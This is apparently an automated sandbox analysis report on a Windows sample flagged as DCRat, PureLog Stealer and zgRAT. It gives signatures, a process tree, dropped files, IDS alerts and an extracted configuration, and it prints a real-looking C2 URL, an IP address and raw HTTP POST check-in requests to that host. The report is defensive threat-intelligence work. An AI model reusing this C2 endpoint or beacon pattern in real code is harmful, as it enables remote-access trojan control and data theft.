Edit tour

Windows Analysis Report
FuWRu2Mg82.exe

Overview

General Information

Sample name:	FuWRu2Mg82.exe renamed because original name is a hash value
Original sample name:	6C5F6433BAE4CBF3DC2D1FD40B716B08.exe
Analysis ID:	1545737
MD5:	6c5f6433bae4cbf3dc2d1fd40b716b08
SHA1:	0eba0dd22b3f5053798eba26e027ef7383602774
SHA256:	9bcfa4a19be080565caf27f4ea1bc691c124601bb120aac4ca55802593af400a
Tags:	DCRatexeuser-abuse_ch
Infos:

Detection

DCRat, PureLog Stealer, zgRAT

Score:	100
Range:	0 - 100
Whitelisted:	false
Confidence:	100%

Signatures

Antivirus / Scanner detection for submitted sample

Antivirus detection for dropped file

Found malware configuration

Multi AV Scanner detection for dropped file

Multi AV Scanner detection for submitted file

Suricata IDS alerts for network traffic

Yara detected DCRat

Yara detected PureLog Stealer

Yara detected zgRAT

.NET source code contains method to dynamically call methods (often used by packers)

AI detected suspicious sample

Machine Learning detection for dropped file

Machine Learning detection for sample

Queries sensitive video device information (via WMI, Win32_VideoController, often done to detect virtual machines)

Uses ping.exe to check the status of other devices and networks

Uses ping.exe to sleep

AV process strings found (often used to terminate AV products)

Allocates memory with a write watch (potentially for evading sandboxes)

Checks if Antivirus/Antispyware/Firewall program is installed (via WMI)

Contains long sleeps (>= 3 min)

Creates a process in suspended mode (likely to inject code)

Creates files inside the system directory

Detected potential crypto function

Dropped file seen in connection with other malware

Drops PE files

Drops PE files to the windows directory (C:\Windows)

Drops files with a non-matching file extension (content does not match file extension)

Enables debug privileges

Found dropped PE file which has not been started or loaded

IP address seen in connection with other malware

Internet Provider seen in connection with other malware

May sleep (evasive loops) to hinder dynamic analysis

PE file contains executable resources (Code or Archives)

Queries sensitive BIOS Information (via WMI, Win32_Bios & Win32_BaseBoard, often done to detect virtual machines)

Queries sensitive Operating System Information (via WMI, Win32_ComputerSystem, often done to detect virtual machines)

Queries sensitive processor information (via WMI, Win32_Processor, often done to detect virtual machines)

Queries the volume information (name, serial number etc) of a device

Sample execution stops while process was sleeping (likely an evasion)

Sample file is different than original file name gathered from version info

Uses 32bit PE files

Uses a known web browser user agent for HTTP communication

Uses code obfuscation techniques (call, push, ret)

Classification

Process Tree

System is w10x64

FuWRu2Mg82.exe (PID: 7344 cmdline: "C:\Users\user\Desktop\FuWRu2Mg82.exe" MD5: 6C5F6433BAE4CBF3DC2D1FD40B716B08)

cmd.exe (PID: 7476 cmdline: "C:\Windows\System32\cmd.exe" /C "C:\Users\user\AppData\Local\Temp\0jztGmSOAj.bat" MD5: 8A2122E8162DBEF04694B9C3E0B6CDEE)

conhost.exe (PID: 7484 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)

chcp.com (PID: 7524 cmdline: chcp 65001 MD5: 33395C4732A49065EA72590B14B64F32)

PING.EXE (PID: 7540 cmdline: ping -n 10 localhost MD5: 2F46799D79D22AC72C241EC0322B011D)

axnJvpyQnMRKSw.exe (PID: 7620 cmdline: "C:\Recovery\axnJvpyQnMRKSw.exe" MD5: 6C5F6433BAE4CBF3DC2D1FD40B716B08)

cmd.exe (PID: 7940 cmdline: "C:\Windows\System32\cmd.exe" /C "C:\Users\user\AppData\Local\Temp\O2a76Ow1QW.bat" MD5: 8A2122E8162DBEF04694B9C3E0B6CDEE)

conhost.exe (PID: 7952 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)

chcp.com (PID: 7988 cmdline: chcp 65001 MD5: 33395C4732A49065EA72590B14B64F32)

w32tm.exe (PID: 8004 cmdline: w32tm /stripchart /computer:localhost /period:5 /dataonly /samples:2 MD5: 81A82132737224D324A3E8DA993E2FB5)

axnJvpyQnMRKSw.exe (PID: 8152 cmdline: "C:\Recovery\axnJvpyQnMRKSw.exe" MD5: 6C5F6433BAE4CBF3DC2D1FD40B716B08)

cmd.exe (PID: 2916 cmdline: "C:\Windows\System32\cmd.exe" /C "C:\Users\user\AppData\Local\Temp\6KfhU02lmW.bat" MD5: 8A2122E8162DBEF04694B9C3E0B6CDEE)

conhost.exe (PID: 6664 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)

chcp.com (PID: 5776 cmdline: chcp 65001 MD5: 33395C4732A49065EA72590B14B64F32)

w32tm.exe (PID: 1508 cmdline: w32tm /stripchart /computer:localhost /period:5 /dataonly /samples:2 MD5: 81A82132737224D324A3E8DA993E2FB5)

axnJvpyQnMRKSw.exe (PID: 1272 cmdline: "C:\Recovery\axnJvpyQnMRKSw.exe" MD5: 6C5F6433BAE4CBF3DC2D1FD40B716B08)

cmd.exe (PID: 7468 cmdline: "C:\Windows\System32\cmd.exe" /C "C:\Users\user\AppData\Local\Temp\dYHSyFVcIa.bat" MD5: 8A2122E8162DBEF04694B9C3E0B6CDEE)

conhost.exe (PID: 5980 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)

chcp.com (PID: 5768 cmdline: chcp 65001 MD5: 33395C4732A49065EA72590B14B64F32)

w32tm.exe (PID: 7164 cmdline: w32tm /stripchart /computer:localhost /period:5 /dataonly /samples:2 MD5: 81A82132737224D324A3E8DA993E2FB5)

axnJvpyQnMRKSw.exe (PID: 5232 cmdline: "C:\Recovery\axnJvpyQnMRKSw.exe" MD5: 6C5F6433BAE4CBF3DC2D1FD40B716B08)

cmd.exe (PID: 4820 cmdline: "C:\Windows\System32\cmd.exe" /C "C:\Users\user\AppData\Local\Temp\k9Xkw6Am4N.bat" MD5: 8A2122E8162DBEF04694B9C3E0B6CDEE)

conhost.exe (PID: 7752 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)

chcp.com (PID: 7812 cmdline: chcp 65001 MD5: 33395C4732A49065EA72590B14B64F32)

PING.EXE (PID: 7816 cmdline: ping -n 10 localhost MD5: 2F46799D79D22AC72C241EC0322B011D)

axnJvpyQnMRKSw.exe (PID: 7992 cmdline: "C:\Recovery\axnJvpyQnMRKSw.exe" MD5: 6C5F6433BAE4CBF3DC2D1FD40B716B08)

cmd.exe (PID: 7920 cmdline: "C:\Windows\System32\cmd.exe" /C "C:\Users\user\AppData\Local\Temp\RHLnW0oZVx.bat" MD5: 8A2122E8162DBEF04694B9C3E0B6CDEE)

conhost.exe (PID: 6164 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)

chcp.com (PID: 8016 cmdline: chcp 65001 MD5: 33395C4732A49065EA72590B14B64F32)

w32tm.exe (PID: 8004 cmdline: w32tm /stripchart /computer:localhost /period:5 /dataonly /samples:2 MD5: 81A82132737224D324A3E8DA993E2FB5)

axnJvpyQnMRKSw.exe (PID: 7968 cmdline: "C:\Recovery\axnJvpyQnMRKSw.exe" MD5: 6C5F6433BAE4CBF3DC2D1FD40B716B08)

cmd.exe (PID: 7860 cmdline: "C:\Windows\System32\cmd.exe" /C "C:\Users\user\AppData\Local\Temp\5xIcrgADPl.bat" MD5: 8A2122E8162DBEF04694B9C3E0B6CDEE)

conhost.exe (PID: 7880 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)

chcp.com (PID: 5780 cmdline: chcp 65001 MD5: 33395C4732A49065EA72590B14B64F32)

w32tm.exe (PID: 3796 cmdline: w32tm /stripchart /computer:localhost /period:5 /dataonly /samples:2 MD5: 81A82132737224D324A3E8DA993E2FB5)

axnJvpyQnMRKSw.exe (PID: 2844 cmdline: "C:\Recovery\axnJvpyQnMRKSw.exe" MD5: 6C5F6433BAE4CBF3DC2D1FD40B716B08)

cmd.exe (PID: 5692 cmdline: "C:\Windows\System32\cmd.exe" /C "C:\Users\user\AppData\Local\Temp\gXPzuBRgcB.bat" MD5: 8A2122E8162DBEF04694B9C3E0B6CDEE)

conhost.exe (PID: 6112 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)

chcp.com (PID: 5184 cmdline: chcp 65001 MD5: 33395C4732A49065EA72590B14B64F32)

w32tm.exe (PID: 4836 cmdline: w32tm /stripchart /computer:localhost /period:5 /dataonly /samples:2 MD5: 81A82132737224D324A3E8DA993E2FB5)

axnJvpyQnMRKSw.exe (PID: 5376 cmdline: "C:\Recovery\axnJvpyQnMRKSw.exe" MD5: 6C5F6433BAE4CBF3DC2D1FD40B716B08)

cmd.exe (PID: 5292 cmdline: "C:\Windows\System32\cmd.exe" /C "C:\Users\user\AppData\Local\Temp\VW6Uh1R2rX.bat" MD5: 8A2122E8162DBEF04694B9C3E0B6CDEE)

conhost.exe (PID: 3180 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)

chcp.com (PID: 1220 cmdline: chcp 65001 MD5: 33395C4732A49065EA72590B14B64F32)

w32tm.exe (PID: 7164 cmdline: w32tm /stripchart /computer:localhost /period:5 /dataonly /samples:2 MD5: 81A82132737224D324A3E8DA993E2FB5)

axnJvpyQnMRKSw.exe (PID: 7600 cmdline: "C:\Recovery\axnJvpyQnMRKSw.exe" MD5: 6C5F6433BAE4CBF3DC2D1FD40B716B08)

cmd.exe (PID: 7484 cmdline: "C:\Windows\System32\cmd.exe" /C "C:\Users\user\AppData\Local\Temp\O4lRoaYFUn.bat" MD5: 8A2122E8162DBEF04694B9C3E0B6CDEE)

conhost.exe (PID: 2180 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)

cleanup

Malware Threat Intel

Provided by

Name	Description	Attribution	Blogpost URLs	Link
DCRat	DCRat is a typical RAT that has been around since at least June 2019.	No Attribution	https://axmahr.github.io/posts/asyncrat-detection/ https://blog.sekoia.io/privateloader-the-loader-of-the-prevalent-ruzki-ppi-service/ https://blog.talosintelligence.com/2021/10/crimeware-targets-afghanistan-india.html https://blog.talosintelligence.com/2022/08/modernloader-delivers-multiple-stealers.html https://blogs.blackberry.com/en/2022/01/kraken-the-code-on-prometheus	https://malpedia.caad.fkie.fraunhofer.de/details/win.dcrat

Name	Description	Attribution	Blogpost URLs	Link
zgRAT	zgRAT is a Remote Access Trojan malware which sometimes drops other malware such as AgentTesla malware. zgRAT has an inforstealer use which targets browser information and cryptowallets.Usually spreads by USB or phishing emails with -zip/-lnk/.bat/.xlsx attachments and so on.	No Attribution	https://bazaar.abuse.ch/browse/signature/zgRAT/ https://kcm.trellix.com/corporate/index?page=content&id=KB96190&locale=en_US https://www.cloudsek.com/blog/threat-actors-abuse-ai-generated-youtube-videos-to-spread-stealer-malware https://www.difesaesicurezza.com/cyber/cybercrime-rfq-dalla-turchia-veicola-agenttesla-e-zgrat/ https://www.fortinet.com/blog/threat-research/smokeloader-using-old-vulnerabilities	https://malpedia.caad.fkie.fraunhofer.de/details/win.zgrat

Malware Configuration

Threatname: DCRat

{"C2 url": "http://114936cm.nyashcrack.top/EternalHttpprocessauthdbwordpressUploads", "MUTEX": "DCR_MUTEX-7jlTI5ViwtbGbzplUVv1", "Params": {"0": "{SYSTEMDRIVE}/Users/", "1": "false", "2": "false", "3": "true", "4": "true", "5": "true", "6": "true", "7": "false", "8": "true", "9": "true", "10": "true", "11": "true", "12": "true", "13": "true", "14": "true"}}

Yara Signatures

Initial Sample

Source	Rule	Description	Author	Strings
FuWRu2Mg82.exe	JoeSecurity_zgRAT_1	Yara detected zgRAT	Joe Security
FuWRu2Mg82.exe	JoeSecurity_PureLogStealer	Yara detected PureLog Stealer	Joe Security

Dropped Files

Source	Rule	Description	Author
C:\Recovery\axnJvpyQnMRKSw.exe	JoeSecurity_zgRAT_1	Yara detected zgRAT	Joe Security
C:\Recovery\axnJvpyQnMRKSw.exe	JoeSecurity_PureLogStealer	Yara detected PureLog Stealer	Joe Security
C:\Windows\Web\ApplicationFrameHost.exe	JoeSecurity_zgRAT_1	Yara detected zgRAT	Joe Security
C:\Windows\Web\ApplicationFrameHost.exe	JoeSecurity_PureLogStealer	Yara detected PureLog Stealer	Joe Security
C:\Windows\Web\ApplicationFrameHost.exe	JoeSecurity_PureLogStealer	Yara detected PureLog Stealer	Joe Security
C:\Windows\Web\ApplicationFrameHost.exe	JoeSecurity_PureLogStealer	Yara detected PureLog Stealer	Joe Security
Click to see the 1 entries

Memory Dumps

Source	Rule	Description	Author
00000000.00000000.1653544673.0000000000222000.00000002.00000001.01000000.00000003.sdmp	JoeSecurity_PureLogStealer	Yara detected PureLog Stealer	Joe Security
00000000.00000002.1708412433.0000000012D13000.00000004.00000800.00020000.00000000.sdmp	JoeSecurity_DCRat_1	Yara detected DCRat	Joe Security
Process Memory Space: FuWRu2Mg82.exe PID: 7344	JoeSecurity_DCRat_1	Yara detected DCRat	Joe Security
Process Memory Space: axnJvpyQnMRKSw.exe PID: 7620	JoeSecurity_DCRat_1	Yara detected DCRat	Joe Security

Unpacked PEs

Source	Rule	Description	Author	Strings
0.0.FuWRu2Mg82.exe.220000.0.unpack	JoeSecurity_zgRAT_1	Yara detected zgRAT	Joe Security
0.0.FuWRu2Mg82.exe.220000.0.unpack	JoeSecurity_PureLogStealer	Yara detected PureLog Stealer	Joe Security

Suricata Signatures

ET MALWARE [ANY.RUN] DarkCrystal Rat Check-in (POST)

Timestamp	SID	Severity	Classtype	Source IP	Source Port	Destination IP	Destination Port	Protocol
2024-10-30T22:32:14.858953+0100	2048095	1	A Network Trojan was detected	192.168.2.4	49731	37.44.238.250	80	TCP
2024-10-30T22:32:25.458858+0100	2048095	1	A Network Trojan was detected	192.168.2.4	62001	37.44.238.250	80	TCP
2024-10-30T22:32:34.359009+0100	2048095	1	A Network Trojan was detected	192.168.2.4	62002	37.44.238.250	80	TCP
2024-10-30T22:32:43.815019+0100	2048095	1	A Network Trojan was detected	192.168.2.4	62003	37.44.238.250	80	TCP
2024-10-30T22:32:57.233991+0100	2048095	1	A Network Trojan was detected	192.168.2.4	62011	37.44.238.250	80	TCP
2024-10-30T22:33:07.187127+0100	2048095	1	A Network Trojan was detected	192.168.2.4	62058	37.44.238.250	80	TCP
2024-10-30T22:33:16.655876+0100	2048095	1	A Network Trojan was detected	192.168.2.4	62111	37.44.238.250	80	TCP
2024-10-30T22:33:27.418045+0100	2048095	1	A Network Trojan was detected	192.168.2.4	62167	37.44.238.250	80	TCP
2024-10-30T22:33:37.342381+0100	2048095	1	A Network Trojan was detected	192.168.2.4	62218	37.44.238.250	80	TCP
2024-10-30T22:33:45.952561+0100	2048095	1	A Network Trojan was detected	192.168.2.4	62263	37.44.238.250	80	TCP
2024-10-30T22:33:59.526792+0100	2048095	1	A Network Trojan was detected	192.168.2.4	62276	37.44.238.250	80	TCP

Joe Sandbox Signatures

Click to jump to signature section

Show All Signature Results

AV Detection

Antivirus / Scanner detection for submitted sample

Source: FuWRu2Mg82.exe

Avira: detected

Antivirus detection for dropped file

Source: C:\Users\user\Desktop\BpwztmWB.log	Avira: detection malicious, Label: HEUR/AGEN.1362695
Source: C:\Users\user\Desktop\DOypUrKc.log	Avira: detection malicious, Label: HEUR/AGEN.1362695
Source: C:\Users\user\AppData\Local\Temp\gXPzuBRgcB.bat	Avira: detection malicious, Label: BAT/Delbat.C
Source: C:\Users\user\Desktop\CQWhyrvh.log	Avira: detection malicious, Label: TR/AVI.Agent.updqb
Source: C:\Users\user\AppData\Local\Temp\0jztGmSOAj.bat	Avira: detection malicious, Label: BAT/Delbat.C
Source: C:\Users\user\AppData\Local\Temp\RHLnW0oZVx.bat	Avira: detection malicious, Label: BAT/Delbat.C
Source: C:\Users\user\AppData\Local\Temp\5xIcrgADPl.bat	Avira: detection malicious, Label: BAT/Delbat.C
Source: C:\Users\user\Desktop\DHkzZdjU.log	Avira: detection malicious, Label: HEUR/AGEN.1362695
Source: C:\Users\user\AppData\Local\Temp\6KfhU02lmW.bat	Avira: detection malicious, Label: BAT/Delbat.C
Source: C:\Recovery\axnJvpyQnMRKSw.exe	Avira: detection malicious, Label: HEUR/AGEN.1323342
Source: C:\Users\user\AppData\Local\Temp\k9Xkw6Am4N.bat	Avira: detection malicious, Label: BAT/Delbat.C
Source: C:\Users\user\AppData\Local\Temp\O4lRoaYFUn.bat	Avira: detection malicious, Label: BAT/Delbat.C
Source: C:\Users\user\AppData\Local\Temp\O2a76Ow1QW.bat	Avira: detection malicious, Label: BAT/Delbat.C
Source: C:\Users\user\AppData\Local\Temp\VW6Uh1R2rX.bat	Avira: detection malicious, Label: BAT/Delbat.C
Source: C:\Users\user\Desktop\ENiSZQDC.log	Avira: detection malicious, Label: HEUR/AGEN.1300079
Source: C:\Users\user\Desktop\DZeKnCHE.log	Avira: detection malicious, Label: HEUR/AGEN.1300079
Source: C:\Users\user\AppData\Local\Temp\dYHSyFVcIa.bat	Avira: detection malicious, Label: BAT/Delbat.C

Found malware configuration

Source: 00000000.00000002.1708412433.0000000012D13000.00000004.00000800.00020000.00000000.sdmp

Malware Configuration Extractor: DCRat {"C2 url": "http://114936cm.nyashcrack.top/EternalHttpprocessauthdbwordpressUploads", "MUTEX": "DCR_MUTEX-7jlTI5ViwtbGbzplUVv1", "Params": {"0": "{SYSTEMDRIVE}/Users/", "1": "false", "2": "false", "3": "true", "4": "true", "5": "true", "6": "true", "7": "false", "8": "true", "9": "true", "10": "true", "11": "true", "12": "true", "13": "true", "14": "true"}}

Multi AV Scanner detection for dropped file

Source: C:\Recovery\axnJvpyQnMRKSw.exe	ReversingLabs: Detection: 71%
Source: C:\Users\user\Desktop\BBFiueAC.log	ReversingLabs: Detection: 29%
Source: C:\Users\user\Desktop\BUFrAOsF.log	ReversingLabs: Detection: 23%
Source: C:\Users\user\Desktop\CdAHeASz.log	ReversingLabs: Detection: 23%
Source: C:\Users\user\Desktop\DzuiDjow.log	ReversingLabs: Detection: 20%
Source: C:\Users\user\Desktop\ENiSZQDC.log	ReversingLabs: Detection: 25%
Source: C:\Users\user\Desktop\EihSxCbb.log	ReversingLabs: Detection: 20%
Source: C:\Users\user\Desktop\FzdFbFVV.log	ReversingLabs: Detection: 20%
Source: C:\Users\user\Desktop\GTNiEPlU.log	ReversingLabs: Detection: 50%
Source: C:\Users\user\Desktop\HQSFHwhn.log	ReversingLabs: Detection: 25%
Source: C:\Users\user\Desktop\HiZYWSbq.log	ReversingLabs: Detection: 50%
Source: C:\Users\user\Desktop\IimQJXBp.log	ReversingLabs: Detection: 20%
Source: C:\Users\user\Desktop\IlfySofL.log	ReversingLabs: Detection: 23%
Source: C:\Users\user\Desktop\IuCyCayI.log	ReversingLabs: Detection: 50%
Source: C:\Users\user\Desktop\JOnPlldQ.log	ReversingLabs: Detection: 20%
Source: C:\Users\user\Desktop\KGLrCwIr.log	ReversingLabs: Detection: 20%
Source: C:\Users\user\Desktop\KPopdtuG.log	ReversingLabs: Detection: 20%
Source: C:\Users\user\Desktop\LQfwyfBd.log	ReversingLabs: Detection: 20%
Source: C:\Users\user\Desktop\MLpHgvqI.log	ReversingLabs: Detection: 29%
Source: C:\Users\user\Desktop\MwRFEUPK.log	ReversingLabs: Detection: 20%
Source: C:\Users\user\Desktop\NJvfkcmc.log	ReversingLabs: Detection: 20%
Source: C:\Users\user\Desktop\OKWQGJri.log	ReversingLabs: Detection: 20%
Source: C:\Users\user\Desktop\PhxVLhaD.log	ReversingLabs: Detection: 20%
Source: C:\Users\user\Desktop\RQVXPZTR.log	ReversingLabs: Detection: 20%
Source: C:\Users\user\Desktop\SmsYQpId.log	ReversingLabs: Detection: 23%
Source: C:\Users\user\Desktop\SwMdNZCQ.log	ReversingLabs: Detection: 20%
Source: C:\Users\user\Desktop\UGLNXWUK.log	ReversingLabs: Detection: 20%
Source: C:\Users\user\Desktop\UcbVcsDq.log	ReversingLabs: Detection: 20%
Source: C:\Users\user\Desktop\UfIwHmIl.log	ReversingLabs: Detection: 20%
Source: C:\Users\user\Desktop\UyIFNWAo.log	ReversingLabs: Detection: 20%
Source: C:\Users\user\Desktop\UyzMiIGL.log	ReversingLabs: Detection: 29%
Source: C:\Users\user\Desktop\WdCFCCCo.log	ReversingLabs: Detection: 25%
Source: C:\Users\user\Desktop\XkYexKxm.log	ReversingLabs: Detection: 50%
Source: C:\Users\user\Desktop\YNJWsoOG.log	ReversingLabs: Detection: 50%
Source: C:\Users\user\Desktop\YksUcbqD.log	ReversingLabs: Detection: 20%

Multi AV Scanner detection for submitted file

Source: FuWRu2Mg82.exe

ReversingLabs: Detection: 71%

AI detected suspicious sample

Source: Submited Sample

Integrated Neural Analysis Model: Matched 99.8% probability

Machine Learning detection for dropped file

Source: C:\Users\user\Desktop\BpwztmWB.log	Joe Sandbox ML: detected
Source: C:\Users\user\Desktop\DOypUrKc.log	Joe Sandbox ML: detected
Source: C:\Users\user\Desktop\DHkzZdjU.log	Joe Sandbox ML: detected
Source: C:\Users\user\Desktop\CpJqgrwA.log	Joe Sandbox ML: detected
Source: C:\Recovery\axnJvpyQnMRKSw.exe	Joe Sandbox ML: detected
Source: C:\Users\user\Desktop\ENiSZQDC.log	Joe Sandbox ML: detected
Source: C:\Users\user\Desktop\DZeKnCHE.log	Joe Sandbox ML: detected
Source: C:\Users\user\Desktop\DzuiDjow.log	Joe Sandbox ML: detected

Machine Learning detection for sample

Source: FuWRu2Mg82.exe

Joe Sandbox ML: detected

Source: FuWRu2Mg82.exe

Static PE information: EXECUTABLE_IMAGE, LINE_NUMS_STRIPPED, LOCAL_SYMS_STRIPPED, 32BIT_MACHINE

Source: FuWRu2Mg82.exe

Static PE information: DYNAMIC_BASE, NX_COMPAT, NO_SEH, TERMINAL_SERVER_AWARE

Source:	Binary string: stem.pdbpdbtem.pdbj source: axnJvpyQnMRKSw.exe, 00000033.00000002.2594691011.0000000001105000.00000004.00000020.00020000.00000000.sdmp
Source:	Binary string: C_MSIL\System\v4.0_4.0.0.0__b77a5c561934e089\System.pdb source: axnJvpyQnMRKSw.exe, 0000001A.00000002.2233548129.000000001B7FC000.00000004.00000020.00020000.00000000.sdmp
Source:	Binary string: System.pdbN\|2h\|2 Z\|2_CorDllMainmscoree.dll source: axnJvpyQnMRKSw.exe, 0000000E.00000002.2002706193.000000001C8A4000.00000004.00000020.00020000.00000000.sdmp, axnJvpyQnMRKSw.exe, 00000020.00000002.2365797037.000000001CCA0000.00000004.00000020.00020000.00000000.sdmp, axnJvpyQnMRKSw.exe, 00000026.00000002.2388785557.0000000001366000.00000004.00000020.00020000.00000000.sdmp, axnJvpyQnMRKSw.exe, 0000002C.00000002.2482566801.00000000009F6000.00000004.00000020.00020000.00000000.sdmp, axnJvpyQnMRKSw.exe, 00000033.00000002.2759594209.000000001B7D2000.00000004.00000020.00020000.00000000.sdmp, axnJvpyQnMRKSw.exe, 00000039.00000002.2847414592.000000001AFD0000.00000004.00000020.00020000.00000000.sdmp
Source:	Binary string: s\dll\System.pdb source: axnJvpyQnMRKSw.exe, 00000005.00000002.1918500382.000000001C5A8000.00000004.00000020.00020000.00000000.sdmp
Source:	Binary string: stem.pdbpdbtem.pdbd source: axnJvpyQnMRKSw.exe, 0000002C.00000002.2624188199.000000001AF60000.00000004.00000020.00020000.00000000.sdmp
Source:	Binary string: System.pdb source: axnJvpyQnMRKSw.exe, 0000000E.00000002.2002706193.000000001C8A4000.00000004.00000020.00020000.00000000.sdmp, axnJvpyQnMRKSw.exe, 00000020.00000002.2365797037.000000001CCA0000.00000004.00000020.00020000.00000000.sdmp, axnJvpyQnMRKSw.exe, 00000026.00000002.2388785557.0000000001366000.00000004.00000020.00020000.00000000.sdmp, axnJvpyQnMRKSw.exe, 0000002C.00000002.2482566801.00000000009F6000.00000004.00000020.00020000.00000000.sdmp, axnJvpyQnMRKSw.exe, 00000033.00000002.2759594209.000000001B7D2000.00000004.00000020.00020000.00000000.sdmp, axnJvpyQnMRKSw.exe, 00000039.00000002.2847414592.000000001AFD0000.00000004.00000020.00020000.00000000.sdmp

Source: C:\Users\user\Desktop\FuWRu2Mg82.exe	File opened: C:\Users\user	Jump to behavior
Source: C:\Users\user\Desktop\FuWRu2Mg82.exe	File opened: C:\Users\user\Documents\desktop.ini	Jump to behavior
Source: C:\Users\user\Desktop\FuWRu2Mg82.exe	File opened: C:\Users\user\AppData	Jump to behavior
Source: C:\Users\user\Desktop\FuWRu2Mg82.exe	File opened: C:\Users\user\AppData\Local\Temp	Jump to behavior
Source: C:\Users\user\Desktop\FuWRu2Mg82.exe	File opened: C:\Users\user\Desktop\desktop.ini	Jump to behavior
Source: C:\Users\user\Desktop\FuWRu2Mg82.exe	File opened: C:\Users\user\AppData\Local	Jump to behavior

Networking

Suricata IDS alerts for network traffic

Source: Network traffic	Suricata IDS: 2048095 - Severity 1 - ET MALWARE [ANY.RUN] DarkCrystal Rat Check-in (POST) : 192.168.2.4:62003 -> 37.44.238.250:80
Source: Network traffic	Suricata IDS: 2048095 - Severity 1 - ET MALWARE [ANY.RUN] DarkCrystal Rat Check-in (POST) : 192.168.2.4:62001 -> 37.44.238.250:80
Source: Network traffic	Suricata IDS: 2048095 - Severity 1 - ET MALWARE [ANY.RUN] DarkCrystal Rat Check-in (POST) : 192.168.2.4:62002 -> 37.44.238.250:80
Source: Network traffic	Suricata IDS: 2048095 - Severity 1 - ET MALWARE [ANY.RUN] DarkCrystal Rat Check-in (POST) : 192.168.2.4:49731 -> 37.44.238.250:80
Source: Network traffic	Suricata IDS: 2048095 - Severity 1 - ET MALWARE [ANY.RUN] DarkCrystal Rat Check-in (POST) : 192.168.2.4:62058 -> 37.44.238.250:80
Source: Network traffic	Suricata IDS: 2048095 - Severity 1 - ET MALWARE [ANY.RUN] DarkCrystal Rat Check-in (POST) : 192.168.2.4:62011 -> 37.44.238.250:80
Source: Network traffic	Suricata IDS: 2048095 - Severity 1 - ET MALWARE [ANY.RUN] DarkCrystal Rat Check-in (POST) : 192.168.2.4:62167 -> 37.44.238.250:80
Source: Network traffic	Suricata IDS: 2048095 - Severity 1 - ET MALWARE [ANY.RUN] DarkCrystal Rat Check-in (POST) : 192.168.2.4:62218 -> 37.44.238.250:80
Source: Network traffic	Suricata IDS: 2048095 - Severity 1 - ET MALWARE [ANY.RUN] DarkCrystal Rat Check-in (POST) : 192.168.2.4:62263 -> 37.44.238.250:80
Source: Network traffic	Suricata IDS: 2048095 - Severity 1 - ET MALWARE [ANY.RUN] DarkCrystal Rat Check-in (POST) : 192.168.2.4:62276 -> 37.44.238.250:80
Source: Network traffic	Suricata IDS: 2048095 - Severity 1 - ET MALWARE [ANY.RUN] DarkCrystal Rat Check-in (POST) : 192.168.2.4:62111 -> 37.44.238.250:80

Uses ping.exe to check the status of other devices and networks

Source: C:\Windows\System32\cmd.exe

Process created: C:\Windows\System32\PING.EXE ping -n 10 localhost

Source: Joe Sandbox View

IP Address: 37.44.238.250 37.44.238.250

Source: Joe Sandbox View

ASN Name: HARMONYHOSTING-ASFR HARMONYHOSTING-ASFR

Source: global traffic	HTTP traffic detected: POST /EternalHttpprocessauthdbwordpressUploads.php HTTP/1.1Content-Type: application/x-www-form-urlencodedUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:94.0) Gecko/20100101 Firefox/94.0Host: 114936cm.nyashcrack.topContent-Length: 344Expect: 100-continueConnection: Keep-Alive
Source: global traffic	HTTP traffic detected: POST /EternalHttpprocessauthdbwordpressUploads.php HTTP/1.1Content-Type: application/x-www-form-urlencodedUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/96.0.4664.45 Safari/537.36Host: 114936cm.nyashcrack.topContent-Length: 344Expect: 100-continueConnection: Keep-Alive
Source: global traffic	HTTP traffic detected: POST /EternalHttpprocessauthdbwordpressUploads.php HTTP/1.1Content-Type: application/x-www-form-urlencodedUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/95.0.4638.69 Safari/537.36 Edg/95.0.1020.53Host: 114936cm.nyashcrack.topContent-Length: 344Expect: 100-continueConnection: Keep-Alive
Source: global traffic	HTTP traffic detected: POST /EternalHttpprocessauthdbwordpressUploads.php HTTP/1.1Content-Type: application/x-www-form-urlencodedUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:91.0) Gecko/20100101 Firefox/91.0Host: 114936cm.nyashcrack.topContent-Length: 344Expect: 100-continueConnection: Keep-Alive
Source: global traffic	HTTP traffic detected: POST /EternalHttpprocessauthdbwordpressUploads.php HTTP/1.1Content-Type: application/x-www-form-urlencodedUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/95.0.4638.69 Safari/537.36 OPR/81.0.4196.60Host: 114936cm.nyashcrack.topContent-Length: 344Expect: 100-continueConnection: Keep-Alive
Source: global traffic	HTTP traffic detected: POST /EternalHttpprocessauthdbwordpressUploads.php HTTP/1.1Content-Type: application/x-www-form-urlencodedUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:94.0) Gecko/20100101 Firefox/94.0Host: 114936cm.nyashcrack.topContent-Length: 344Expect: 100-continueConnection: Keep-Alive
Source: global traffic	HTTP traffic detected: POST /EternalHttpprocessauthdbwordpressUploads.php HTTP/1.1Content-Type: application/x-www-form-urlencodedUser-Agent: Mozilla/5.0 (Windows NT 10.0; rv:91.0) Gecko/20100101 Firefox/91.0Host: 114936cm.nyashcrack.topContent-Length: 344Expect: 100-continueConnection: Keep-Alive
